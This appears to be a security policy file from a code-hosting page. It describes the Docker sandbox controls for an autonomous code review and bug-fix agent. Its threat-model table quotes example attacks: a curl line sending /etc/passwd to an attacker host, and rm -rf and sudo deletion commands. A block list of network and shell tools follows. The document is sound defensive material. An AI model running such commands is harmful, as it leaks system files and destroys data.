Spaces:

SouravNath
/

repomind-api

Running

App Files Files Community

repomind-api / docs /SECURITY_POLICY.md

SouravNath

Initial commit

dc71cad 4 days ago

preview code

raw

history blame contribute delete

3.62 kB

Sandbox Security Policy

Purpose

This document describes the security controls applied to the Docker-based code execution sandbox used by the Autonomous Code Review & Bug-Fix Agent.

Threat Model

The sandbox runs untrusted LLM-generated code and arbitrary pytest test suites from public GitHub repositories. The risk categories are:

Threat	Example	Control
Data exfiltration	`curl https://attacker.com/$(cat /etc/passwd)`	`--network=none`
Resource exhaustion	Infinite loop / fork bomb	`--memory=2g`, `--cpus=2.0`, 60s timeout
Host filesystem access	`open('/etc/passwd')`	`--read-only`, volume-limited
Privilege escalation	`sudo rm -rf /`	Non-root user (uid=1000)
Malicious commands	`rm -rf /workspace`	Command whitelist
Persistent state	Writing outside /workspace	`--read-only` + limited tmpfs

Security Controls (7 Layers)

1. Network Isolation — `--network=none`

The container has zero network access. No DNS, no HTTP, no TCP sockets. This is the most important control — it prevents data exfiltration and supply-chain attacks from untrusted test dependencies.

2. Memory cgroup — `--memory=2g`

Container is killed by the kernel OOM killer if memory exceeds 2 GB. Prevents fork bombs and memory exhaustion from affecting the host.

3. CPU cgroup — `--cpus=2.0`

Limits container to 2 CPU cores. Prevents CPU saturation that would degrade other running containers / the host system.

4. Read-Only Filesystem — `--read-only --tmpfs=/tmp:size=256m`

The container's filesystem is mounted read-only. Only two writable locations:

/workspace — the cloned repo (bind-mounted, scoped to this run)
/tmp — tmpfs, 256 MB, wiped at container exit

5. Command Whitelist — `ALLOWED_COMMANDS`

Before any command reaches Docker, the executor checks the base command name against an allowlist: {git, pytest, python, python3, pip, pip3, cat, ls, echo, find, grep, head, tail, mkdir, cp, mv, touch, chmod}.

Commands like rm, curl, wget, bash, sh, nc are blocked at this layer.

6. Non-Root User — `uid=1000`

All processes run as agent:agent (1000:1000). If an exploit escapes the command whitelist, it cannot modify system files or escalate privileges.

7. Timeout — 60 seconds SIGKILL

The executor sets a 60-second hard timeout. The container is killed via docker stop --time=0 (SIGKILL) to prevent hung processes from consuming resources indefinitely.

Isolation Per Run

Each SWE-bench instance gets a fresh temporary directory as its workspace. The container is created with --rm so it is automatically deleted after each run. No state persists between runs.

Audit Log

Every command executed in the sandbox is logged with:

instance_id
command (truncated to first 3 tokens for brevity)
returncode
elapsed_seconds
timed_out flag

Logs are written to structlog (JSON format in production) and ingested by the Prometheus/Grafana observability stack in Phase 8.

Known Limitations

Conda environments: Some SWE-bench repos require specific conda environments with C extensions. The current sandbox uses pip-only install. This may cause test failures for repos with complex native dependencies.
Docker-in-Docker: The sandbox does not support running Docker inside Docker. Repos that spawn subprocesses to call Docker will fail at the network level.
Flaky tests: ~8% of SWE-bench issues have non-deterministic tests. These may burn retries even when the patch is correct. Flagged as flaky_test category.